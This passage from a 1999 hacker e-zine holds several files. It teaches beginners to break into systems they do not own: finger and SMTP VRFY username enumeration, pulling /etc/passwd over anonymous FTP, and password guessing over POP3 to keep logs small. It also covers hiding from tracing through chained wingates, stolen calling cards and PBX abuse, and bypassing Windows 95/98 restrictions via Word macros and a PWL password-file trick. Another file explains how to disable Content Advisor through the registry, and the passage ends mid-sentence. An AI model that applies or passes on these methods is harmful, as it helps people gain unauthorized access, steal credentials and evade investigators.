Windows and will laugh at you for running it. I feel both Linux and Windows come in handy so I always have some sort of linux access along with my Windows computer. I really suggest though you watch the conversations wherever your chatting or posting to get a sense on what is going on. Above all try not piss off anyone. III. Getting Started How do I find good boxes to mess with? Well when you talk to some people this seems to be the biggest problem. I personally never found it a problem but I figured I should include this for those who do have trouble with it. Interesting computers, as well as phones for those inspiring phreaks, can come from everyday life. You may notice a local business is online and wonder what about what the system is and what it does. When your out and about keep your eyes open for things that may pose interesting. For instance while checking out some good UNIX books (which by now I hope you all have done) I took it upon myself to sit down at one of their computers and mess around trying to get a non internet computer to get on so I could check my mail. In the process a nasty librarian came over to me and reprimanded me. I of course played innocent but when I got home I said to myself "Wonder what these people are holding on to so tightly". So I fired up the my computer, headed for the internet, found there website, then looked at the ip address there card catalog was on from there found a nice old UNIX V system which suprised me since all their user computers are running Windows 95. In the end although I did not mess with it too seriously, but I found it allowed routing mail which meant I could forge mail from them, not to mention it was a good server which did not show my IP in the header. Now if I did not find it on the internet I would turn to the old fashion way of finding computers among other things, exchange scanning. This is usually done with the aid of a program called a wardialer. This is simply the process of dialing every number in a exchange in hopes of finding a carrier. I was shocked at the cool things you can find while doing this. I am currently thinking of writing a seperate article on this since its a very broad subject. The fact of the matter scanning is illegal in some areas and can get you in hot water with your local phone company which I have had some close calls with. The message here is be careful. Look up some info on this before trying it. As for other methods for finding computers there are programs like wardialers which scan a large range of IP's for servers. I have never used one of these before and quite frankly have no desire to either. I will say though that a freind of mine found some interesting things by doing this. Now one very good way to find good things is to look at where e-mails come from through the full headers. If somebody mailbombed you or forged e-mail to you look on the bright side they pretty much showed you a anonymous e-mail server. The final way and by far my favorite is to look up a city or area code and explore its computers and phone numbers. Pick your home town if you like although I do not reccommend it. My favorite spots are the towns of former residences which I resided at and also vacation spots of the past or future. Being creative is what will help you. Thats what hacking is all about. Making the Connection Now this is probally reveiw for most everyone but for the few who have posted asking this here it is. Lets say we wanted to hack target.edu, a university in Fakeville, USA. Now lets suppose we already had an account on the system, a UNIX shell account. To connect we want to telnet into port 23, the telnet port. This would be where we'd be presented with a login screen. Now if you want to hack an account thats the place to begin. Now the first way and by far the best, is to telnet out of a UNIX shell account which by giving this command: Telnet target.edu 23 This command given at the command prompt would give you the login screen. Now lets suppose you can't get a UNIX shell account, nor do you have any kind of UNIX on your computer. In the case your running Windows we will use the telnet client shipped with Windows. We get to our telnet client by simply going to Start --> Run --> telnet. From there we would go to Connect --> Remote System. Now for host we put in target.edu and for port, 23. For term type I use Vt100 but its personal preference I suppose. Now if we wanted to telnet to another daemon besides the default telnet port we would type in the port that daemon runs on. Heres a freebie, port 25 is Send Mail Transfer Protocol (for info on it download my article "The Wonderful and Evil World Of E-mail" available on my website). I strongly suggest you get yourself a UNIX port list available on most hacking sites on the web. Analyzing This is where the bulk of the work comes in, finding out everything you can find without actually entering a username and password. Now remember while gathering info you don't want to make the system administrator too nervous or he may pick up the good old telephone and have a little chat with your ISP. ISP's are quick to throw your ass off especially if its a big service. Now the first thing to do is find out what ports a computer has open, for those who don't know ports are where various services run. Now there are two ways to do this, you can do a port scan or you can port surf by hand. Now if you want to keep things quiet your best bet is to do it by hand. If you try to automate it then your asking for trouble because all those connects will show up in the logs. Now if you don't give a rat's ass about the system operator knowing then start up the port scanner and go take a walk. When you come back you will be looking at a list of ports. Now when your looking for ports a handy dandy port list will come in good use. That should be numero uno on your equipment list. After time you won't not even need it. That time is not now though, you are still inexperienced so I suggest printing it off and keeping it in a spot you won't lose it. Now there are many services which will give you info but my favorite is port 79, finger. With this little service you can gain a wealth of information such as usernames, info on users (perfect for social engineering), and times when last logins occured. So what you should do is take a look if port 79 is open. It has become rarer, but by no means is it extinct. I still find it often. Now keep in mind you will not see what your typing and you will only get one shot before it disconnects you. Some of the first things you can try with finger are common names. Trying john, mary, paul, joe, jane, and so on. This can sometimes produce quite a few valid usernames. Along with that, depending on the version of finger and how trusting they are, you can get other info. Full names, addresses, phone numbers, e-mail addresses and things along that line are out there for a the taking. Now you can also try some other things with finger such as fingering root, the superuser account of UNIX systems. This will tell you if he is currently on or when was the last time he logged in. It may also give you some other interesting details. Try fingering accounts like bin, system, manager, @, 0, @target.com, and anything else you can think of. Now I suggest you turn on logging so that you can reveiw all this info at another time and figure out what will be useful. Also another little thing that can help you figure out valid usernames with out filling up those login logs is the SMTP daemon on port 25, most likely Sendmail. Using the command "vrfy" you can check to see if a certain user exsists on the system. Some things to try are common names, guest, and anonymous. Make freinds with SMTP, it will be quite helpful in some cases of getting into systems. What you may also want to do is check to see if they allow for anonymous ftp. If it is login as you would any anonymous ftp server (if you are not familiar with ftp go to a search engine and look up "Ftp Help"). Now if you get in I suggest nosing around the /etc directory. This holds the password file in a UNIX system. Download all the files from there and take a look at them. The one you really want to look at is passwd. Now I know you may have read old texts and think you will just download it and run a password cracker on it and then have superuser access. Fat chance. Most password files are shadowed meaning in the place of where the password should be you have some garbage character there (*, $, !, etc). If by some freak chance you do get one that isn't shadowed get a hold of a UNIX password cracker and dictionary file. Then use those to crack the password file. This is doubtful though but it doesn't hurt to try. While in FTP check out everthing you have access too. Sometimes you'll find some info that could be useful, not to mention I have heard some morons upload stuff they would attach to an e-mail to anonymous ftp since it is quicker. I never came across that but I bet it be nice to. And the last thing to do before you log off is see if you have write access. Try to upload something to anonymous ftp and if it works then note that because it may be possible to do some interesting exploits with it. More likely you will get a access denied message. Exploitation Ok you gathered all the info you could on this server. You analyzed it over and over. You know every port that is open and you know what service it is running. You know each peice of software and version they are running. Once you have all this info you have many ways this can go. Usually your gonna see your breakins to systems by either two ways. Number one, and my favorite, user and system administrator stupidity. Number two and also a very exciting thing is problems with the software and misconfigurations. Now lets talk about the first way. Back in the old days this was the main way to get in, the easiest at least. You'd call up some dipshit of a user, say that his system was going to crash if you didn't get in there to correct a bug. Now that the world is shifting towards a more computer literate society people are wising up to these things but thats not to say there aren't still stupid people out there, if you don't believe me look at the hype about the last major virus, Melissa, which was nothing more then a macro that crashed a few mail servers. People shit their pants over this. This just goes to show you that people get scared when they don't understand something. Now there are some papers out there on social engineering, but let me say right now no article will make you an experienced bullshit artist. That only comes with practice. Now besides for getting the users to tell you their password you can attempt to guess their password. Now you already have some info on the person. You should know there gender and name from finger information. Also if you checked to see if they have a personal web page you may know everything about that person from their favorite cearal to what they hate in society. Take this info and create a list of common passwords this person may choose. Now when you consider your subject remember that your giggly secratary is going to pick words like love and honey while your horny system operator who hasn't seen light is going to be picking words like blowjob. Now this may sound funny but every girl I know picks cute little passwords. When you make your list you have to consider your target. Once you have your list together you are going to attempt to brute force the password. Meaning educated guessing. I also suggest if you know they have e-mail on the system you attempt to do your brute forcing through port 110, POP3. POP, post office protocol, doesn't stop you after three tries. This is helpful in reducing the logs a bit. When you do this you also better be using one of the protection methods listed below. No matter what people tell you jail is no fun and Big Dick Bubba is not gonna be gentle with you either. Now as I said before there is a second method which is a little more advanced and by far more practicle. This is finding exploits in the software or services a server is running. The best example is Sendmail, the SMTP daemon. This peice of work has so many holes its not even funny. I strongly suggest you read up on sendmail exploits because these are very common to find. Throughout the years sendmail has compromised root, password files, and other such security risks. If your target server is running sendmail I suggest you check with either www.rootshell.com or some sort of search engine to see if its an exploitable version. Other daemons which have fallen prey are IMAP, fingerd (as if giving user info wasn't enough), and POP (not limiting the amount of bad logins sound safe to you?). Check up on all the software versions and see what you turn up with. You see its all about how much you can learn, how much information you have. When you check out a system always keep your eyes open. Now one of the weird and crazy things you have to do is THINK! There is no complete textbook method to hacking. No secret codes or methods that will always comprimise every system. This is an important thing to remember. Now as for exploits besides for checking with rootshell.com I also suggest you subscribe to any security mailings you can find. Keep up to date on these days because new techniques come out everyday.What To Do Once Your In Ok you were able to get into a system, either you have a user or administrator account. Now depending on the system both may be very interesting. Once you are in, you hopefully understand how to get around in the system. If you don't then I recommend you find out what the hell you are doing before you mess something up. Commands like help and man will get you around but further help can always be obtained by searching online. Look around and see what you have access to. Take a look at what directories you have access to and wether you have read or write access. Also check to see what e-mail is lying around. You may even have access to a web directory. Now you have access to many things and you are very powerful at this point. Now something that runs rampant with newbies is a surge of all that power and they become destructive. Dance, sing, and rejoice but do not screw things up without thinking it through. This is where ethics come in, you have to be responible or you are no better then the media stereotypes. So as a final word on it be careful. IV. Protection *67 This is one of the most simple and easiest way to start protecting yourself yet so many hackers and phreakers don't get it. For instance the guy who spread the Mellissa Virus thought he was being slick because he was using a stolen AOL account to do it. Yet the guy didn't even make it difficult for AOL to trace him by dialing in with *67. Remember most ISP's will keep records of where the call came from. When you are dialing anything that isn't toll free you should most definetyly use it. With the widespread of Caller ID its become a real nessicity. *67 is free to use so why not always use it. Its only takes three extra seconds at the most out of your life, so be smart and use it. This is not to say that it will be the one thing to save your ass, it won't. It just makes it a little bit tougher. Now if you are calling up a toll free number (800, 888, or 877) don't even bother with *67. They have something called ANI which will automatically give them your number whether you *67 or not. As a precaution though do yourself a favor and do it. Calling Cards Everyone has had experiences with prepaid calling cards and knows how they work. These little babies are quite handy when it comes to hacking and phreaking. One reason is because you can easily steal them or card them and not get caught. The second though is most of the time it won't show your home phone number since your dialing out of the company who owns the calling card. Using these cards can be a added peice of protection but please remember the calling card company keeps logs and if requested it is possible to trace it back to the phone you used, so your best bet is to use this with other methods we are talking about today. PBX's This is one of the best ways to protect yourself and get free calls at the same time. A PBX, Private Branch Exchange, is a phone network set up in offices so that the company doesn't have to pay for a ton of lines, instead just have a few lines going in and out and those are on the PBX. You know when your at school and you have to press nine to get an outside line, well thats a PBX. Now sometimes these PBX's have outside access so there employees don't have to get charged. Usually you will find one of these while scanning and it will identify itself by a long tone or a distant dial tone. These are for the most part gaurded by a code. For some indepth info on hacking these I suggest you do a search for "PBX hacking". Still use some other protection methods in conjunction with this. Borrowed Accounts Alone this method is shit because they will trace it back to the phone line if you do anything really bad. Though if you do some mild hacking and use this with some other methods it can be quite good. You don't have to worry whether you will get kicked off your ISP since its not really yours anyway. Also it can be used to impersonate other people on IRC if you have reason to. Now if you plan to be doing something don't do it with your own account because when they check the logs they will see your name, address, and phone number and that will be it. So as always be catious. Public Terminals Now you will either love or hate this method. It seems most public places are getting public terminals. Libraries, schools, airports, you name it and they are starting to offer it. These can offer good things such as anonmity, but there are drawbacks. This is the outside world we are talking about. You will have to deal with nosy people, librarians are really a pain in the ass (school librarians are the worst). If you use a public terminal there is a good chance there will be security in place that will prevent you from doing a lot of things, this goes twice if you are doing stuff at school. So although you have the anonmity, hiding behind the innocent who use the computer to chat in Yahoo! or AOL. Just try not to create too much attention to yourself while doing this either or people will be on your back about doing anything. Wingates These are one of the best methods of protection while hacking on the internet. These are abundent and easy to find by either scanning or looking at the bans on Undernet for exploitable wingates. These are used by telnetting in and getting a prompt like, Wingate>. From this you can type in a sever and port number like this, target.com 23. That will telnet you to target.com and if you want added protection telnet to another wingate and telnet from that. You can string together several wingates and hack all you like without getting caught. This is timely but its worth it to keep your ass out of jail. Outdials These are a thing of the past but supposedly there are still some around. I will say the alt.2600 FAQ's outdial list doesn't work so don't waste your time. Outdials are used to dial out of UNIX systems meaning you can dial anonymous and free to one of the few BBSs still around or too a computer dialup on the other side of the country. If you hack a shell and it has a program called Kermit you are in luck because you will be able to do this. If you really want to hunt down a outdial get a text on it. Rememeber on the internet you have information as fast as you can type so just look it up. V. Conclusion Behaviour If you have read through this and you are new you probally have gained quite a lot of information and hopefully I have peaked your interest a bit. No one is going to go out and hack for you so if you really are dedicated then get out there and do it. As you get out into the cyberworld be aware though no one like a asshole so act with integrity and smarts. Try to be nice even to those ignorant bastards asking for punters. Try to explain them thats not hacking and what hacking is. If you can't though just tell them to get lost. Just try to mantain some of those manners mommy and daddy taught you and things will be fine. Closing I bid you good luck in your hacking career, may it be long and bust free. Use your head in all situations and listen to the advice I have given you. As a last peice of advice check out phreaking, phone hacking. The skills you learn come in handy for hacking. Last but not least have fun and learn something, thats what this is all about. If you didn't like this article I could care less. Get all the my texts and other information you are looking for at my website http://mobboss.dragx.cx By The Mob Boss Co-edited by TheGuy This has been a publication written by THE MOB BOSS, he is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the users discretion. THE MOB BOSS in no way or form supports, aids, particapates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS is strictly for informational purposes only. THE MOB BOSS copyright 1999 all rights reserved. :..::..End Of File..::..: :..::..File 5 Of 14.::..: :.Windows Security Holes: :..::..By NeonBunny.::..: <*> Windoze 95/98 Security Holes +----------------------------+ Most schools and businesses are using Windows 95/98 yet most texts concentrate on obscure operating systems so here is an insight on how to hack the O/S from hell! Some of this stuff is aimed at newbies so don't flame me, you never know, you might just learn something! The major way to gain access to areas your not to (passwords still apply) is to use the "common dialogue box open/save dialogue" or in English, the box where you save or open your work in nearly all programs. This dialogue box includes a box for you too enter the document path, by enter the name/address of what you want to access the files section will normally display what you want, bypassing Windoze security. An example to this it to get to network computers by typing "\\server" will give you a list of the shared folders on the computer called "server". By using this method you can use the top pull down box to work your way up the network tree to a full list of machines. Another use can be to gain access to drives which you have normally been banned, since it is hard to set up read and write access to local drives with Windoze, this can prove invaluable. By typing "c:\*.*" you can gain access to the local drive even if the sysadmins don't want you. Similar tricks can be achieved with Netscape Navigator and Internet Explorer. Microsoft Word is a great hacking tool and yet it's badly set-up on school networks all over the world. The major problem with Word is that it's too powerful and includes it's own programming language. By using this you can run any program on the network such as Explorer, Registry Editors etc. To use this with Word 95 simply go to the "Tools" menu and choose "Macro" from here just type a new name and press enter. This will through you into Word Basic, now all you need to do is the type between the "Sub MAIN" and "End Sub" lines shell "c:\windows\explorer" Clicking on the play button will start up Windoze explorer for all your hacking needs. The real fun with good old macros is that they occasional bypass the Windoze security settings, allowing you to run Policy Editor even if you are not allowed to run it normally. So you can then modify your settings to give you access to Registry Editing Programs and then shell Regedit the same way. By deleting the appwiz.cpl files it's possible to stop the create shortcut wizard, if this happens then the .lnk file is still created, simple right click it and choose properties to modify the shortcut to point to your favourite executable/drive. If this doesn't work then create a new file (in away way you see fit) and rename the file from .??? to .lnk and then choose properties. Hitting Control + Esc at a normal login screen on Win 95 will bring up Task Manager, from here you can run explorer to bring you a desktop or any other executable fun. This can (and is on RM networks) prevented by adding taskman.exe= to the [boot] section in system.ini. It's often easy to access forbidden programs by right clicking the desktop (and other places) and choosing "New" and then the file associated with your program, it'll only run certain programs but it's a nice way to get to NotePad etc. quickly. By browsing though a Common Dialog Box (see above) you can select executables and (assuming that QuickView is installed) choose QuickView from the right click menu, from here choose the icon in the top left of the QuickView window to launch the program. If Windows 95 has IE4 or Windows 98 (with IE4 built in) it is normally possible to create new toolbars. Right click the start bar, choose Toolbars and choose New Toolbar. From here you can enter the hidden drive letters and get a full directory listing on the start bar. It's almost impossible to remove the Help option from the start menu, open it up and do a search for "Click here" which will bring up a list of help files which provide a button that'll let you launch certain programs. Hitting F8 when Windows say "Starting Windows 9X" (or simply after the BIOS appears to be finishing off) will bring you a boot menu. From here you can choose Command Prompt and Safe Mode amongst other such goodies. If this doesn't work then modify the file "c:\msdos.sys". Within this file is the setting which disables the "Starting Windows 9X" option menu, modify the "BOOTKEYS=0" line to read "BOOTKEYS=1" to reap the benefits of this hole. Running the group-converter program (c:\windows\grpconv.exe) brings back the shutdown command on the start bar. This program can also be used to create start menu items from the included .grp files in the c:\windows\ directory, just run the .grp files or on some machines, run the grpconv for all of them. Windows stores nearly all passwords within a single file which is normally the called "c:\windows\USERNAME.pwl" although encrypted all is not lost. The encryption uses the username to encrypt the password. A common way into the system is to delete the user's password list and then login as the user where Windows will prompt you for a new password. If you rename this file instead of removing it and then login as the user the same effect will take place. Once in, you can rename the password list back and now use all of the user's stored passwords. This can prove useful on a Windows 95 network where all folder passwords that are chosen to be stored are kept in the password list. As a result of this, you can rename the admin PWL and then rename it back to gain access to folders which would normally be password protected, you can also remotely administer computers and in fact do anything assuming that the lazy sysadmin choose to save the password. Using old Windows programs can get through restrictions set up with policy editor, since they don't use the rundll32 APIs (I think that's correct) they don't have hidden drives etc. Try fileman.exe and progman.exe for examples of this. Windows, like nearly all O/Ses, use Shells, the usual one is explorer.exe which can't be removed but Microsoft saw fit to use the one exe as the shell and the file-explorer, duh! Other shells include Internet Browsers, these don't follow the Windows drive restrictions etc. since they can run independently (usually because they're designed to run on more than one platform). If you're having problems getting into restricted areas of the desktops then try creating folders names XXXX.{NNNN-NNNN} where XXXX is the folder name and NNNN is the numbers, by using the below list this will get you access to some areas of interest: E.g. Printers.{2227A280-3AEA-1069-A2DE-08002B30309D} {208D2C60-3AEA-1069-A2D7-08002B30309D} - Network Neighborhood {2227A280-3AEA-1069-A2DE-08002B30309D} - Printers - works {20D04FE0-3AEA-1069-A2D8-08002B30309D} - My Computer {21EC2020-3AEA-1069-A2DD-08002B30309D} - Control Panel - works {3DC7A020-0ACD-11CF-A9BB-00AA004AE837} - Internet - sweet!! {645FF040-5081-101B-9F08-00AA002F954E} - Recycle Bin - works {85BBD920-42A0-1069-A2E4-08002B30309D} - Brief Case - works {871C5380-42A0-1069-A2EA-08002B30309D} - Internet Explorer - a link {a4d92740-67cd-11cf-96f2-00aa00a11dd9} - DUN - Doesn't work {D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Task Scheduler We've seen how we can bypass drives restrictions through the common dialog box but similar can be done with explorer on some early versions of Windows, take a peek in the tools menu and see if there's a go... option, if so simply type in the drive and away you go, explorer even seems to unhide the drive for the rest of the session! Instead of pressing cancel at the login screen why not try CTRL+ALT+Break, ALT+F4 or CTRL+ALT+Scroll Lock which also does the same thing. If the FIND command is needed there's no need to start hacking your way into the admin account, just hit CONTROL + ESC (to bring up the start menu) ESC (to hide it again) F3 (to bring up the find dialog) now that was hard wasn't it! NeonBunny the_neon_bunny@hotmail.com :..::..End Of File..::..: :..::..File 6 Of 14.::..: :.Portsurfing Computers.: :..::..By Darkflame.::..: <*> PortSurfing *darkflame@zetnet.co.uk* The Introduction I have chosen portsurfing as my next topic of discussion because I feel that it is a fairly easy, but possibly rewarding skill that takes advantage of the individual's perception, and imagination. It (in it's basic, un-tooled) form requires no programs that you don't already have on your machine (be it Unix or Windows). There are some key concepts you have to understand for this text to make any sense to you. Well as much sense as a text by me can make :). They are things you will probably have heard of before but some may not, so have a skim, and if you recognise them skip to the next part. Port (Virtual) - A software port that is used for a specific purpose. A daemon runs on this port, offering services to any user who drops by. Daemon - A piece of software which manipulates TCP/IP and offers a particular service to the user of the port it's designed to run on. TCP/IP - Transmission Control Protocol/Internet Protocol. (See my next text for details) Main Text There are almost an infinite amount of ports available, but some are more well known than others. For example, when contacting a web page your browser contacts port 80 of the remote computer, and port 21 when looking for an FTP host. You do not need to connect to a specific port, when the client already has a preset port: Netscape Navigator -> Web Page WS_FTP -> FTP Host Your telnet client can also connect to these, and any other, ports, even if they are not intended to. This is not illegal, and provides you with a whole new perspective of the computer you are connected to. These ports can be found using a program like SATAN or SAINT for Unix and Linux. These programs check for open ports and exploitable daemons from there onwards. But as I professed that this would be a text where I didn't expect you to have any other programs than the ones already on your machine. I will show how this can be done manually. Now you select your target host (www.fubar.com will be used for demonstration purposes). A port extremely well known for crackers is Port 79 ( finger port). This port allows you to find out information on users on the system. Early versions of a finger program are extremely easy to crash, and also have a tendancy to either run from root, or make calls to root. (I'm assuming you know what root is). So in theory, if this program just happened to crash while you were sitting there, you may just happen to find yourself lying on root. I'm not saying that you should do this, in fact I'm saying you shouldn't because its against the law. To see if your target host www.fubar.com had the finger port enabled you would use the command from your Unix shell or DOS prompt: telnet www.fubar.com 79 Hopefully you would get the message: Connected to www.fubar.com >From here, you would try and coax the daemon into telling you how it takes it (input that is). You would do this by typing: man - (the man command on UNIX gives you online help for a program ? - (trying to get the machine to show you what commands it takes) help - (self explanatory) One of these should work. If they don't then try other keywords that come to mind, and see what kind of response you get, this is where you are left to your own initiative. You could also telnet to port 15, which shows all the network connections made by your host. If you think about it, you can probably see how port surfing leads on to hundreds of possible break ins. Lots of daemons have buggy software, and smaller servers may run these as a money saving option. You can see what port software is exploitable from www.rootshell.com, but you should see if you can find out information on the software running. For instance if you saw that www.fubar.com was running ushttp v1.0 (fictitious) on their web port. You would go to www.infoseek.com and do a search for 'ushttp://'. From here you could have a look at the software's page, and see how professional it looked, how much it cost etc. All this should give you a clearer picture about the system you are hacking, and knowledge of the system you are hacking is vitally important. You should see how the software is made up, and how it could possibly be manipulated to allow you into the host. Please try to refrain from crashing the port to leave you on root because this is considered cracking, and to me it is too 'script kiddie' ish to be regarded as hacking. Hopefully with a little bit of thought you can see how you can expand from this information, to match the system you are hacking. Dodgy daemons and interesting ports are very popular ways of gaining access on a machine. Port surfing is a very good way of achieving lots through a simple technique. List of common or standard ports: Port number Service 7 echo 9 discard 11 systat 13 daytime 15 netstat 19 chargen 21 ftp 23 telnet 25 smtp 37 time 39 rlp 43 whois 53 domain 70 gopher 79 finger 80 http 110 pop 119 nntp 443 shttp 512 biff 513 rlogin who 514 shell syslog 520 route There are more but these are the most common ones. Remember: Get onto your computer, and call upon your telnet program. To connect give the command: telnet When you get a response, it's all down to you from there on in. -- darkflame@fuckyou.co.uk http://welcome.to/digital.insanity 'The roots of education are bitter, but the fruits are sweet' :..::..End Of File..::..: :..::..File 7 Of 14.::..: :.::..The Virus File.::.: :..::.:.By HitMan.:.::..: Viruses: -=-=-=-= I for one can start by saying that most of us have come across a virus at some stage in their life. It may have been yours or your mates but it still means that you know what I am talking about. When I was about seven or eight years old I came across my very first virus 'RIPPER' and this by no means was a joke. It completely messed up my life by infecting my disks and destroying my programs. It was a pain in the ass. But since the day after that experience I have now protected myself and I have intercepted such viruses as 'RAPE' and 'MESSIAH' etc. The list is endless but basically this might clear up some of those so-called newbie questions or just simply a nice little file for your collection. By far the most common method of transmission for viruses has been the floppy disk (90% of all virii have been transmitted by a floppy). In order to stop any infection companies such as McAfee (now called Network Associates) have brought out virus protection but because of there being 13 new viruses discovered every day all of the protectors lose the effect. The worst thing about the protectors is that as they are a needed program, they consume memory which in turn will decrease the power of your machine. This is a big piss-up if you consider that they are not even guaranteed to find the fucker. With that in mind many people disable the protector/scanner which leaves them wide open for the pray of 'abusive crackers'. A problem that has come up is that when converting your drive to FAT32 with Windows 98 the conversion changes your partition table and your boot record. As these are just a couple of things that the scanner looks out for and tries to prevent it causes a very big upset with the scanner and the scanner will take none of the grief Windows 98 tries to put it through and starts putting up all sorts of blocks. When you disable the scanner to install Windows 98 and when it is installed you make the program active again it will then prompt you if you want the scanner to fix 'corrupted' drive. Which in these cases will overwrite the old table onto the new and cause chain reactions on most of the programs on your computer. To put it in plain English "Do not permit the change of overwriting the table". BIOS Viruses: -=-=-=-=-=-=- Motherboards frequently store the BIOS in a type of memory known as flash memory. This is EE-ROM, or Electrically Erasable Read Only Memory. Circuitry on the motherboard can erase the content of the BIOS and then reprogram it. Motherboard manufacturers use this technique so that it's possible to upgrade the BIOS easily, with out having to open the case and replace the ROM (Read Only Memory) chip. However there is a small part of the BIOS that is protected against accidental erasure. This is known as the boot block and it's their in case anything goes wrong with the procedure to reprogram the CMOS, you would end up with an unbootable machine. So, the boot block contains enough code to allow a new BIOS to be loaded and programmed from a floppy disk or other source. Clearly, the potential danger is a virus could attach itself to the BIOS itself - by reprogramming the flash memory - or simply erase the BIOS and thrash your system. Unless you have the special floppy disk at hand with new BIOS code that you can load from the boot block, your system would be as fucked as a dodo. However reprogramming the BIOS flash memory is not as straight forward. There are two techniques that a virus author could use to achieve this. If the author knows the hardware design of the motherboard, then the virus can include the specific instructions to erase and reprogram the flash. Alternatively, if the BIOS itself contains the code to erase the Flash - and some do - then the virus can be written to call these BIOS routines. BIOS MAP (on average) ************************************************ * * * * * * * * * * * Flash * System * Self * Others * * Bios * Set-up * Test * 35 % * * 20 % * 30 % * 15 % * * * * * * * * * * * * ************************************************ \ / \ / \________ 65 % ___________/ Although this may vary from computer to computer it is based on an average so don't blame me if it's not down to the decimal point. Hoaxes: -=-=-=- Almost as bad as viruses themselves, in terms of the wasted time, bandwidth and hard disk space that they cause, are virus hoaxes. These have been circulating ever since e-mail was invented and before that on bulletin boards. They are cleverly designed to grab your attention with a warning of a virus spread by e-mail that can cause severe catastrophe. Such dire happenings as erased files, corrupt hard disks, dying pets and toilet seats being left up are frequently cited. Gullible readers are then further ensnared by an attempt to give the warning authenticity, by quoting an authority that the reader might believe, such as Norton or Microsoft. Finally, public spirited recipients are conned by an appeal to spread the warning to prevent your closest friends and family from being infected. To give a example of a typical virus hoax message: "There is a computer virus that is being sent over the Internet". So basically if you see a newsgroup message saying "A Moment of Silence", don't read the message, delete it immediately. As this type of file could be like some viruses that completely rewrite your hard disk, sending everything on it to hell. This would only work if the sender posted in HTML and included some hostile Java bug. So if you really want a piece of advice tell your mates about this orally not through e-mail as that way they might think it's one of these viruses. Look out for one of the common ones such as 'GOOD TIMES' which has being circulating for several years now. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- To get a Dr. Solomons CIH virus detector and removal go to: http://www.drsolomon.com/vircen/valerts/win32cih.html -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- __ __ __ ________ ___ ___ ____ ___ __ | | | | | | |__ __| | \ / | / __ \ | \ | | | |_| | | | | | | \/ | / |__| \ | \ | | | _ | | | | | | |\ /| | / ____ \ | |\ \| | | | | | | | | | | | \/ | | / / \ \ | | \ | |__| |__| |__| |__| |__| |__| /__/ \__\ |__| \___| [-=http://hitman.it.8m.com=-] [-=vectra500@geocities.com=-] :..::..End Of File..::..: :..::..File 8 Of 14.::..: :..Editing The Registry.: :..::.:.By Cyborg.:.::..: <*> Introduction The Registry is a central database that is created by Windows 95 during installation. The entries in that database consist of the hardware, software, users, and preferences data for a single computer, or any computer on a network. Whenever the user makes changes to the Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected in the Registry. Ok, if you have ever read any files dealing with the Registry before you'll notice the first thing the author says is back up your Registry. I personally, couldn't give a shit, if you have to reinstall Windows it is of no consequence to me. <*>----------<*>----------<*>----------<*>----------<*>----------<*> ^ My Computer ^ \ / ----- | | | | | /-------|-------\ / | \ / | \ / | \ / | \ ----- ----- ----- / / / \ \ \ ^ Hkey_Classes_Root ^ Hkey_Current_User ^ Hkey_Local_Machine ^ ^ Hkey_Users ^ Hkey_Current_Config ^ Hkey_Dyn_Data ^ <*>----------<*>----------<*>----------<*>----------<*>----------<*> <*> Registry Editor You can find the Registry Editor in c:\windows\regedit.exe or whatever non standard name you chose as your Windows directory. Copy that onto a backup disk if it pleases you to do so. For future reference you need only choose Run|Regedit if you only want to run the program. Once Regedit is open you should see My Computer and six HKEY folders. As your tool of control over the Windows environment you will have to know Regedit intimately. There is no point being in the driving seat if you can't use a steering wheel, and there is no point getting into a car if you don't know how to turn the keys. Enough with the confusing metaphors. Below is an extract from a Windows help topic: "Overview Of Registry Editor. Registry Editor is an advanced tool that enables you to change settings in your system Registry, which contains information about how your computer runs. Generally, it is best to use Windows controls to change your system settings. You should not edit your Registry unless it is absolutely necessary. If there is an error in your Registry, your computer may become non functional. If this happens, you can restore the Registry to its state when you last successfully started your computer. For instructions, see Related Topics below." As you can see it is the usual bullshit from the bureaucrats at Microsoft. I think what they are really trying to say is that if you start fucking with the Registry you have passed the point of no return. Bill Gates asks you not to go down that road. Warning users off from things that might get icky is a sort of Microsoft trademark. They are safe in the knowledge that their half-assed assessment of Regedit will frighten most new users away. The most key utility to controlling your Win32 box is hidden away in c:\windows with no shortcuts and a whole nine lines devoted to describing it, most of which fits into the Microsoft play-it-safe agenda. <*> Hkey Definitions {1} Hkey_Classes_Root This key points to a branch of Hkey_Local_Machine that describes certain software settings. This key contains essential information about OLE and drag and drop operations, shortcuts, and core aspects of the Windows 95 GUI which we all think are so pretty =). {2} Hkey_Current_User This key points to a branch of Hkey_Users for the user who is currently logged onto the system. Sort of like the equivalent of the Unix who command but not really. {3} Hkey_Local_Machine Contains computer specific information about the type of hardware, software, and other preferences on a given PC. This information is used for all users who log onto this computer. The data is stored in machine code. The software side often includes the serial keys for products you have registered and sometimes encrypted passwords. {4} Hkey_Users This key contains information about the users that log onto the computer. Both generic and user-specific information is used, and each user who uses the system has their own Subkey to accompany the .pwl file in c:\windows. The .pwl file contains the password data whilst the specified Subkey contains all other information. {5} Hkey_Current_Config This key points to a branch of the Key Hkey_Local_Machine \Config that contains information about the current hardware configuration. It is updated when you use the Add New Hardware program. {6} Hkey_Dyn_Data This key points to a branch of Hkey_Local_Machine that contains various bits of information regarding the System's Plug and Play configuration. This information is DYNAMIC, meaning that it may change as devices are added to or removed from the computer. <*> Disabling Content Advisor Ratings The thing about the Registry is that although Microsoft lean on it to keep Windows tip-top they are more dependant on it than you might realise. I mean that they utilise it the running of other Microsoft products. Internet Explorer for instance, although it has been said that it is an integral part of Windows (Microsoft are still in court over that one). The insides of IE are stored in the Registry, including their Internet Options. I have read Usenet posts about reg keys that lower the security zone in IE or enable Java and other malicious things. Take for example the password encoded censor Content Advisor Ratings. If you want to disable their page blocking open up you Regedit and find the key below: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key Now just rename Key to something else e.g. KeyFucked. The next time the Content Advisor Ratings are running the system will not be able to find the key it is searching for. They key actually contains the encrypted password information. I'm sure you can already think of ways that this might be useful. If you are interested in this topic I suggest you do a net search on algorithms. <*> Hidden Shares You must have seen the hype concerning all those Windows trojans. Any guy off the street could own a Windows box, am I right? Well anyone who has ever had to remove a nasty proggie will know where the server implants itself, the Registry. For the trojan to function 24/7 it needs to initialise every time Windows starts up. Now I don't think Back Orifice would have been quite as popular if it 